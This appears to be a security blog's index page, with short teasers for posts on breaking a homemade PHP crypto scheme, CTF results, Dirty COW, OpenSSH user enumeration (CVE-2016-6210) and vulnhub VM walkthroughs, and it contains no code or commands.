I recently did a code review assessment on an application for one of my client. The best part of the application was their own cryptography algorithm.
Moreover, the application was written in PHP and PHP do some strange things with string, characters and XOR operations. It only needed a few lines of python in order to break it.
TL;DR : please do not write your own crypto!
Since January this blog is automatically build using Travis CI. The main advantage is to always use the latest version of Pelican as travis CI always build its environment from scratch. An other advantage is that I am able to update the site just from my browser for minor modifications (spell correction for instance).
This week-end was the insomnihack teaser CTF. I participated with the team The Half Crunchy.
The theme was "RISE OF THE MACHINES" with rogue webserver and flawing cat robot.
We finished 42th with 550 points flagging 5 challenges:
Many thanks to the organisation! It was a really nice CTF.
Thanks to all team members who participated.
Let's encrypt provide free and easy SSL certificates. Nevertheless it need to verify that you own the machine. In order to do that we usually use HTTP verification with the .well-known directory.
Building a Kiosk where Google Chrome is running in full screen and user interaction with the system are reduced to the minimum.
Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (Source: Red Hat)
The 13th if July a new wild CVE appeared (Yes, Pokemon Go is still a buzz for the moment).
The CVE 2016-6210 allow a user enumeration on an SSH server by comparing request time between non existing user and allowed ones. This vulnerability target OpenSSHD with a version of 7.2p2 or inferior.
That means with a good dictionary you may know which user are present on the server with an SSH access.
This post just demonstrate how to exploit this vulnerability with a simple example.
As droopy was not really hard and doesn't contain as much web vulnerability as I would hope for, I tried an other VM SecTalks: BNE0x03 - Simple There were also hints on the description of the machine but with my resolution they do not appear when just browsing the main page of vulnhub so I have not spoiled myself with the hints this time.
A few days ago, I installed a new pentesting box based on Arch Linux with Kali
in a virtual machine. In order to test it I select a light vulnbox on vulnhub : Droopy. There were two hints on the description of the machine on the vulnhub download page:
We will see how to use them in a moment :)